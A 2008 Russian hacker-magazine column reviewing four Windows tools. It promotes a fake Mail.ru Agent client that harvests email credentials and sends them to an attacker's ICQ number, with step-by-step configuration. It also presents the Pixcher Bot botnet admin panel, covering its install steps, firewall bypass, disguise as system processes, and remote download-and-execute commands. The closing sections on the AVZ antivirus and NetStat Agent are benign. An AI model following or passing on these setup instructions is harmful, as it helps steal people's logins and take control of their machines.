Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 118, ОКТЯБРЬ 2008 г.

X-Tools

Леонид «R0id» Стройков (stroikov@gameland.ru)

Fake MailAgent 5.1 FinalVersion

  • ОС: WIndows 2000/XP
  • Автор: _GlaD1aT(o_0R)_

На страницах журнала мы не раз писали о том, как мутят фейки сайта платежки или банка. Но на этот раз я собираюсь представить тебе совершенно новое направление в фейкостроении – создание фейковых клиентских приложений. Чтобы не растекаться мыслью по древу, приведу в пример конкретную утилу – Fake MailAgent 5.1 FinalVersion. Тулза, как ты уже догадался, представляет собой фейковую версию популярного IM-клиента «MailAgent» от Mail.ru. Программа обладает рядом функциональных компонентов и имитирует работу оригинального приложения, сохраняя данные для доступа к мылу, вбитые пользователем в формочки. Отмечу сразу: за использование возможностей утилы в незаконных целях можно огрести по полной, посему предлагаю тебе лишь ознакомиться с прогой. Итак, алгоритм действий при работе с тулзой следующий:

  1. Запускаем ехе'шник
  2. Устанавливаем курсор мышки рядом с надписью «Забыли?» (внимание на скрин, – иначе можно тыкать курсором в поисках скрытой кнопки до посинения)
  3. Жмем на скрытый баттон
  4. В открывшемся меню вбиваем ICQ-номер, который будет принимать логи с фейка
  5. Жмем баттон «Сохранить и выйти»

В результате появился файл IniFile.ini с малопонятным содержимым:

[Секция2]
Текст в окне=
[Секция3]
Текст в окне=@mail.ru
[Секция101]
Текст в окне=123456

В последней строчке указан уин хакера, что отчасти палит работу фейка. Если передать «товарищу» ехе'шник в комплекте с файлом IniFile.ini, то можно ждать сообщений на указанный номер аси.

В общем, в каких целях юзать тулзу и юзать ли вообще – дело твое. Я лишь показал одно из возможных направлений в фейк-индустрии. Будь осторожен!

Pixcher Bot

  • ОС: Windows 2000/XP
  • Автор: Pixcher

В последнее время широкое распространение получили так называемые «системы удаленного администрирования». Что скрывается под этим названием, полагаю, объяснять не нужно. Зачастую требуется надежный инструмент контроля над забугорным ботнетом или конкретной «жертвой». Посему представляю твоему вниманию продукт «Pixcher Bot», предназначенный для комфортного удаленного администрирования всего, чего твоя душа только пожелает.
Сначала тебе необходимо установить веб-админку на свой хост. Для этого:

  1. Ставим права на запись на файл command.txt, а также на каталог files
  2. Редактируем файл config.php (логин/пароль к СУБД)
  3. Запускаем в браузере скрипт install.php
  4. С помощью билдера конфигурируем бота, прописав в билдере ряд параметров

Из возможностей софтины можно выделить:

  • обход фаеров
  • работа от имени svchost.exe, lsass.exe или любого другого процесса
  • загрузка файлов на компьютер по http:// и ftp://
  • запуск exe-файлов
  • возможность обновления бота (замена новой версией)
  • бот получает новые команды только один раз (если боту передать команду на скачивание (get http://test.ru/file.exe), то он один раз скачает этот фай и будет ждать новых команд)
  • добавлена работа бота под ограниченными правами (User/Гость)

Серверное приложение aka бот поддерживает ряд специализированных команд:

  • get – скачать файл по http:// или по ftp:// (пример: get http://test.ru/file.dll)
  • getexe – скачать и запустить файл (пример: get http://test.ru/file.exe)
  • message – мессадж бокс (пример: message blablabla)
  • die – удаление бота из системы и выгрузка его из памяти
  • exec – запуск exe-файла, выполнение системных команд (пример: exec test.exe)

Кроме того, в админке реализована удобная стата, в которой видны ip-адреса и уникальные ключи (принадлежность к железу) всех ботов, обращавшихся за командами.

Одним словом, если есть, что «админить», но нечем – обрати внимание на эту «систему»!

AVZ

  • ОС: Windows 98/NT/2000/XP
  • Автор: Олег Зайцев

Учитывая набор софта в нынешнем выпуске Х-Тулз, справедливости ради предлагаю тебе обратить внимание на антивирусную утилу AVZ. Лозунг ее гласит: «Утила предназначена для уничтожения SpyWare и AdWare модулей, сетевых вирусов (Worm), троянских программ». По заявлению разработчика, утила также содержит специализированные алгоритмы для поиска кейлоггеров и руткитов. Должен тебе сказать, это заявление вовсе не безосновательно (стал бы я иначе занимать драгоценные строчки рубрики!).

Если посмотреть на интерфейс софтины, то можно без труда определить ее ключевые функции:

  1. Баттон «Пуск» позволяет запустить проверку выбранных дисков и каталогов
  2. Баттон «Пауза» позволяет временно приостановить проверку файлов. Возобновление сканирования производится повторным нажатием на кнопку «Пауза»
  3. Баттон «Стоп» позволяет в любой момент прервать процесс проверки

Кроме того, AVZ поддерживает работу с параметрами командной строки. Значения параметров имеют вид:

{} – обязательный строковый параметр, [опция|опция] – одна из перечисленных опций

Все настройки, полученные через параметры командной строки, дублируются элементами интерфейса. Это позволяет производить настройки AVZ через командную строку без запуска сканирования. Для примера, приведу краткий перечень основных параметров при работе через консоль, которые могут пригодиться тебе еще не раз:

SCAN={каталог} – добавляет каталог или диск в список сканируемых. Путь должен начитаться с буквы диска, например c:windows. Также, ты можешь указать неограниченное количество параметров SCAN, содержащих разные значения.

SCANDRIVE= [HDD|FDD|CDROM] – добавляет все диски заданного типа в список сканируемых.

Поддерживается три типа дисков:

  • HDD - винты aka жесткие диски;
  • FDD - флопики aka дисководы и Flash-диски;
  • CDROM - CD/DVD-диски.

SCANFILE={имя файла} – сканирование отдельного файла. Например: SCANFILE=c:windowsfile.exe

NOSCAN={каталог} – исключение заданного каталога из списка проверяемых. Путь должен начитаться с буквы диска, например, c:windows. В командной строке разрешено указывать неограниченное количество параметров NOSCAN – так как обрабатываются все параметры, то можно задать ограничения на сканирование нескольких каталогов.

Например: SCAN=c: NOSCAN=c:temp – будет проведено сканирование всего диска C:, за исключением каталога C:temp.

ScanAllFiles=[Y|N] – сканировать все файлы (независимо от расширения). Аналогично установке переключателя <Типы файлов> в положение <Все файлы>.

ScanFilesMode=[0|1|2] – задает режим сканирования.

  • 0 - сканирование потенциально-опасных файлов;
  • 1 - сканирование всех файлов;
  • 2 - сканирование файлов по маске (необходимо задать маску).

IncludeFiles={маска} – задает маску (или набор масок) файлов, которые необходимо проверить. Аналогично заполнению поля <Включая файлы по маске:>.

ExcludeFiles={маска} – исключить файлы с именами/расширениями по маске. Аналогично заполнению поля <Исключая файлы по маске: :>.

WinTrustLevel=[0|1|2] – режим проверки файла по каталогу безопасности Microsoft (0 - отключена, 1 - проверка по каталогу, 2 - проверка по каталогу). По дефолту установлен режим «1»; включение режима «2» повышает надежность проверки, но увеличивает время проверки файла примерно в два-три раза.

Полное описание всех команд ты найдешь в справочнике AVZ. Советую изучить их, ибо тулза отлично дружит с консолью. Из плюсов утилы выделю и то, что она не требует установки, а, следовательно, может запросто пополнить твой запас боевого софта на флешке.

NetStat Agent

  • ОС: WIndows 2000/XP
  • Автор: _GlaD1aT(o_0R)_

Порой использования одних стандартных консольных утил (типа netstat, ping, tracert, arp, route, ipconfig) оказывается недостаточно. Под рукой было бы неплохо иметь функциональный сетевой инструмент – такой, как NetStat Agent. Это сетевая утила для мониторинга на твоем компе интернет-соединений и для диагностики настроек Сети. Тулза отображает все активные TCP- и UDP-соединения – и их состояние. Для удаленного IP-адреса отображается его географическое местоположение и имя aka hostname. Кроме TCP и UDP-соединений, прога выводит всю инфу о процессе, владельце соединения (пашет только под XP), путь, информацию о разработчике, версию и свойства приложения, список используемых модулей aka dll-библиотек.

С помощью гибких настроек мониторинга ты сможешь без проблем отфильтровать или закрыть ненужные соединения или убить посторонний процесс. В состав NetStat Agent также входит несколько полезных утил, таких как:

  • ping – позволяет проверить доступность хоста, а также проверить работоспособность TCP/IP-настроек Сети
  • tracert – отображает маршрут пакетов к конечному хосту
  • arp – позволяет вывести и отредактировать ARP-кеш
  • ipconfig – выводит всю информацию о сетевых интерфейсах и адаптерах
  • route – выводит таблицу маршрутизации (IP); позволяет добавить, отредактировать или удалить маршрут

Основные возможности софтины:

  • Отслеживает TCP и UDP-соединения на твоем компе. Каждое новое или устаревшее соединение подсвечивается
  • Утила обладает возможностью сконфигурировать специальные правила, которые будут закрывать нежелательные соединения, завершать процесс, проигрывать звуковое оповещение или запускать другие программы
  • Ты можешь обновлять и освобождать DHCP-настройки адаптера
  • Программа строит график для Ping и TraceRoute, выводит географическое положение каждого маршрутизатора
  • Выводит сетевую статистику для адаптеров и TCP/IP-протоколов
  • Мощный лог менеджер позволит тебе просматривать, удалять и очищать netstat и arp лог-файлы

NetStat Agent представляет собой мощную замену стандартным консольным утилитам: netstat, ping, tracert, arp, route, ipconfig. Настоятельно рекомендую обзавестись подобной утилой, поверь, зачастую она просто незаменима :).

Содержание
ttfb: 4.4629573822021 ms